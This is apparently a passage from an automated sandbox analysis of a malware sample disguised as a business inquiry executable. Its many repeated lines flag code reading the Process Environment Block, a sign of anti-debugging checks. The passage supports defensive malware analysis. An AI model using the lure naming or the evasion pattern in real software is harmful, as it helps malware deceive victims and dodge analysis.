                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12750 mov eax, dword ptr fs:[00000030h]4_2_00F12750
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F12750 mov eax, dword ptr fs:[00000030h]4_2_00F12750
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5E75D mov eax, dword ptr fs:[00000030h]4_2_00F5E75D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED0750 mov eax, dword ptr fs:[00000030h]4_2_00ED0750
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0674D mov esi, dword ptr fs:[00000030h]4_2_00F0674D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0674D mov eax, dword ptr fs:[00000030h]4_2_00F0674D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0674D mov eax, dword ptr fs:[00000030h]4_2_00F0674D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4C730 mov eax, dword ptr fs:[00000030h]4_2_00F4C730
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0273C mov eax, dword ptr fs:[00000030h]4_2_00F0273C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0273C mov ecx, dword ptr fs:[00000030h]4_2_00F0273C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0273C mov eax, dword ptr fs:[00000030h]4_2_00F0273C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0C720 mov eax, dword ptr fs:[00000030h]4_2_00F0C720
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0C720 mov eax, dword ptr fs:[00000030h]4_2_00F0C720
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F00710 mov eax, dword ptr fs:[00000030h]4_2_00F00710
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0C700 mov eax, dword ptr fs:[00000030h]4_2_00F0C700
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED0710 mov eax, dword ptr fs:[00000030h]4_2_00ED0710
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0C8F9 mov eax, dword ptr fs:[00000030h]4_2_00F0C8F9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0C8F9 mov eax, dword ptr fs:[00000030h]4_2_00F0C8F9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9A8E4 mov eax, dword ptr fs:[00000030h]4_2_00F9A8E4
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFE8C0 mov eax, dword ptr fs:[00000030h]4_2_00EFE8C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5C89D mov eax, dword ptr fs:[00000030h]4_2_00F5C89D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED0887 mov eax, dword ptr fs:[00000030h]4_2_00ED0887
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F66870 mov eax, dword ptr fs:[00000030h]4_2_00F66870
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F66870 mov eax, dword ptr fs:[00000030h]4_2_00F66870
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5E872 mov eax, dword ptr fs:[00000030h]4_2_00F5E872
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5E872 mov eax, dword ptr fs:[00000030h]4_2_00F5E872
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F00854 mov eax, dword ptr fs:[00000030h]4_2_00F00854
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE2840 mov ecx, dword ptr fs:[00000030h]4_2_00EE2840
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED4859 mov eax, dword ptr fs:[00000030h]4_2_00ED4859
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED4859 mov eax, dword ptr fs:[00000030h]4_2_00ED4859
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0A830 mov eax, dword ptr fs:[00000030h]4_2_00F0A830
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7483A mov eax, dword ptr fs:[00000030h]4_2_00F7483A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7483A mov eax, dword ptr fs:[00000030h]4_2_00F7483A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF2835 mov eax, dword ptr fs:[00000030h]4_2_00EF2835
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF2835 mov eax, dword ptr fs:[00000030h]4_2_00EF2835
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF2835 mov eax, dword ptr fs:[00000030h]4_2_00EF2835
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF2835 mov ecx, dword ptr fs:[00000030h]4_2_00EF2835
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF2835 mov eax, dword ptr fs:[00000030h]4_2_00EF2835
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF2835 mov eax, dword ptr fs:[00000030h]4_2_00EF2835
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5C810 mov eax, dword ptr fs:[00000030h]4_2_00F5C810
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F029F9 mov eax, dword ptr fs:[00000030h]4_2_00F029F9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F029F9 mov eax, dword ptr fs:[00000030h]4_2_00F029F9
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5E9E0 mov eax, dword ptr fs:[00000030h]4_2_00F5E9E0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F049D0 mov eax, dword ptr fs:[00000030h]4_2_00F049D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9A9D3 mov eax, dword ptr fs:[00000030h]4_2_00F9A9D3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F669C0 mov eax, dword ptr fs:[00000030h]4_2_00F669C0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA9D0 mov eax, dword ptr fs:[00000030h]4_2_00EDA9D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA9D0 mov eax, dword ptr fs:[00000030h]4_2_00EDA9D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA9D0 mov eax, dword ptr fs:[00000030h]4_2_00EDA9D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA9D0 mov eax, dword ptr fs:[00000030h]4_2_00EDA9D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA9D0 mov eax, dword ptr fs:[00000030h]4_2_00EDA9D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDA9D0 mov eax, dword ptr fs:[00000030h]4_2_00EDA9D0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED09AD mov eax, dword ptr fs:[00000030h]4_2_00ED09AD
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED09AD mov eax, dword ptr fs:[00000030h]4_2_00ED09AD
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F589B3 mov esi, dword ptr fs:[00000030h]4_2_00F589B3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F589B3 mov eax, dword ptr fs:[00000030h]4_2_00F589B3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F589B3 mov eax, dword ptr fs:[00000030h]4_2_00F589B3
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A0 mov eax, dword ptr fs:[00000030h]4_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A0 mov eax, dword ptr fs:[00000030h]4_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A0 mov eax, dword ptr fs:[00000030h]4_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A0 mov eax, dword ptr fs:[00000030h]4_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A0 mov eax, dword ptr fs:[00000030h]4_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A0 mov eax, dword ptr fs:[00000030h]4_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A0 mov eax, dword ptr fs:[00000030h]4_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A0 mov eax, dword ptr fs:[00000030h]4_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A0 mov eax, dword ptr fs:[00000030h]4_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A0 mov eax, dword ptr fs:[00000030h]4_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A0 mov eax, dword ptr fs:[00000030h]4_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A0 mov eax, dword ptr fs:[00000030h]4_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE29A0 mov eax, dword ptr fs:[00000030h]4_2_00EE29A0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5C97C mov eax, dword ptr fs:[00000030h]4_2_00F5C97C
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF6962 mov eax, dword ptr fs:[00000030h]4_2_00EF6962
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF6962 mov eax, dword ptr fs:[00000030h]4_2_00EF6962
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF6962 mov eax, dword ptr fs:[00000030h]4_2_00EF6962
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F74978 mov eax, dword ptr fs:[00000030h]4_2_00F74978
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F74978 mov eax, dword ptr fs:[00000030h]4_2_00F74978
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F1096E mov eax, dword ptr fs:[00000030h]4_2_00F1096E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F1096E mov edx, dword ptr fs:[00000030h]4_2_00F1096E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F1096E mov eax, dword ptr fs:[00000030h]4_2_00F1096E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F50946 mov eax, dword ptr fs:[00000030h]4_2_00F50946
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F6892B mov eax, dword ptr fs:[00000030h]4_2_00F6892B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5892A mov eax, dword ptr fs:[00000030h]4_2_00F5892A
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5C912 mov eax, dword ptr fs:[00000030h]4_2_00F5C912
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EC8918 mov eax, dword ptr fs:[00000030h]4_2_00EC8918
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EC8918 mov eax, dword ptr fs:[00000030h]4_2_00EC8918
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E908 mov eax, dword ptr fs:[00000030h]4_2_00F4E908
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4E908 mov eax, dword ptr fs:[00000030h]4_2_00F4E908
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0AAEE mov eax, dword ptr fs:[00000030h]4_2_00F0AAEE
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0AAEE mov eax, dword ptr fs:[00000030h]4_2_00F0AAEE
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F04AD0 mov eax, dword ptr fs:[00000030h]4_2_00F04AD0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F04AD0 mov eax, dword ptr fs:[00000030h]4_2_00F04AD0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED0AD0 mov eax, dword ptr fs:[00000030h]4_2_00ED0AD0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F26ACC mov eax, dword ptr fs:[00000030h]4_2_00F26ACC
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F26ACC mov eax, dword ptr fs:[00000030h]4_2_00F26ACC
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F26ACC mov eax, dword ptr fs:[00000030h]4_2_00F26ACC
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED8AA0 mov eax, dword ptr fs:[00000030h]4_2_00ED8AA0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED8AA0 mov eax, dword ptr fs:[00000030h]4_2_00ED8AA0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F26AA4 mov eax, dword ptr fs:[00000030h]4_2_00F26AA4
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F08A90 mov edx, dword ptr fs:[00000030h]4_2_00F08A90
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDEA80 mov eax, dword ptr fs:[00000030h]4_2_00EDEA80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDEA80 mov eax, dword ptr fs:[00000030h]4_2_00EDEA80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDEA80 mov eax, dword ptr fs:[00000030h]4_2_00EDEA80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDEA80 mov eax, dword ptr fs:[00000030h]4_2_00EDEA80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDEA80 mov eax, dword ptr fs:[00000030h]4_2_00EDEA80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDEA80 mov eax, dword ptr fs:[00000030h]4_2_00EDEA80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDEA80 mov eax, dword ptr fs:[00000030h]4_2_00EDEA80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDEA80 mov eax, dword ptr fs:[00000030h]4_2_00EDEA80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EDEA80 mov eax, dword ptr fs:[00000030h]4_2_00EDEA80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00FA4A80 mov eax, dword ptr fs:[00000030h]4_2_00FA4A80
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4CA72 mov eax, dword ptr fs:[00000030h]4_2_00F4CA72
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4CA72 mov eax, dword ptr fs:[00000030h]4_2_00F4CA72
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7EA60 mov eax, dword ptr fs:[00000030h]4_2_00F7EA60
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0CA6F mov eax, dword ptr fs:[00000030h]4_2_00F0CA6F
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0CA6F mov eax, dword ptr fs:[00000030h]4_2_00F0CA6F
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0CA6F mov eax, dword ptr fs:[00000030h]4_2_00F0CA6F
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0A5B mov eax, dword ptr fs:[00000030h]4_2_00EE0A5B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0A5B mov eax, dword ptr fs:[00000030h]4_2_00EE0A5B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED6A50 mov eax, dword ptr fs:[00000030h]4_2_00ED6A50
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED6A50 mov eax, dword ptr fs:[00000030h]4_2_00ED6A50
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED6A50 mov eax, dword ptr fs:[00000030h]4_2_00ED6A50
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED6A50 mov eax, dword ptr fs:[00000030h]4_2_00ED6A50
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED6A50 mov eax, dword ptr fs:[00000030h]4_2_00ED6A50
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED6A50 mov eax, dword ptr fs:[00000030h]4_2_00ED6A50
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED6A50 mov eax, dword ptr fs:[00000030h]4_2_00ED6A50
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFEA2E mov eax, dword ptr fs:[00000030h]4_2_00EFEA2E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0CA38 mov eax, dword ptr fs:[00000030h]4_2_00F0CA38
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F0CA24 mov eax, dword ptr fs:[00000030h]4_2_00F0CA24
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF4A35 mov eax, dword ptr fs:[00000030h]4_2_00EF4A35
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF4A35 mov eax, dword ptr fs:[00000030h]4_2_00EF4A35
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5CA11 mov eax, dword ptr fs:[00000030h]4_2_00F5CA11
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F5CBF0 mov eax, dword ptr fs:[00000030h]4_2_00F5CBF0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFEBFC mov eax, dword ptr fs:[00000030h]4_2_00EFEBFC
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED8BF0 mov eax, dword ptr fs:[00000030h]4_2_00ED8BF0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED8BF0 mov eax, dword ptr fs:[00000030h]4_2_00ED8BF0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED8BF0 mov eax, dword ptr fs:[00000030h]4_2_00ED8BF0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED0BCD mov eax, dword ptr fs:[00000030h]4_2_00ED0BCD
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED0BCD mov eax, dword ptr fs:[00000030h]4_2_00ED0BCD
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ED0BCD mov eax, dword ptr fs:[00000030h]4_2_00ED0BCD
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF0BCB mov eax, dword ptr fs:[00000030h]4_2_00EF0BCB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF0BCB mov eax, dword ptr fs:[00000030h]4_2_00EF0BCB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EF0BCB mov eax, dword ptr fs:[00000030h]4_2_00EF0BCB
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7EBD0 mov eax, dword ptr fs:[00000030h]4_2_00F7EBD0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F84BB0 mov eax, dword ptr fs:[00000030h]4_2_00F84BB0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F84BB0 mov eax, dword ptr fs:[00000030h]4_2_00F84BB0
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0BBE mov eax, dword ptr fs:[00000030h]4_2_00EE0BBE
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EE0BBE mov eax, dword ptr fs:[00000030h]4_2_00EE0BBE
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00ECCB7E mov eax, dword ptr fs:[00000030h]4_2_00ECCB7E
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F7EB50 mov eax, dword ptr fs:[00000030h]4_2_00F7EB50
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F84B4B mov eax, dword ptr fs:[00000030h]4_2_00F84B4B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F84B4B mov eax, dword ptr fs:[00000030h]4_2_00F84B4B
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F78B42 mov eax, dword ptr fs:[00000030h]4_2_00F78B42
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F66B40 mov eax, dword ptr fs:[00000030h]4_2_00F66B40
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F66B40 mov eax, dword ptr fs:[00000030h]4_2_00F66B40
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F9AB40 mov eax, dword ptr fs:[00000030h]4_2_00F9AB40
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFEB20 mov eax, dword ptr fs:[00000030h]4_2_00EFEB20
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00EFEB20 mov eax, dword ptr fs:[00000030h]4_2_00EFEB20
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F98B28 mov eax, dword ptr fs:[00000030h]4_2_00F98B28
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F98B28 mov eax, dword ptr fs:[00000030h]4_2_00F98B28
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4EB1D mov eax, dword ptr fs:[00000030h]4_2_00F4EB1D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4EB1D mov eax, dword ptr fs:[00000030h]4_2_00F4EB1D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4EB1D mov eax, dword ptr fs:[00000030h]4_2_00F4EB1D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4EB1D mov eax, dword ptr fs:[00000030h]4_2_00F4EB1D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4EB1D mov eax, dword ptr fs:[00000030h]4_2_00F4EB1D
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exeCode function: 4_2_00F4EB1D mov eax, dword ptr fs:[00000030h]4_2_00F4EB1D
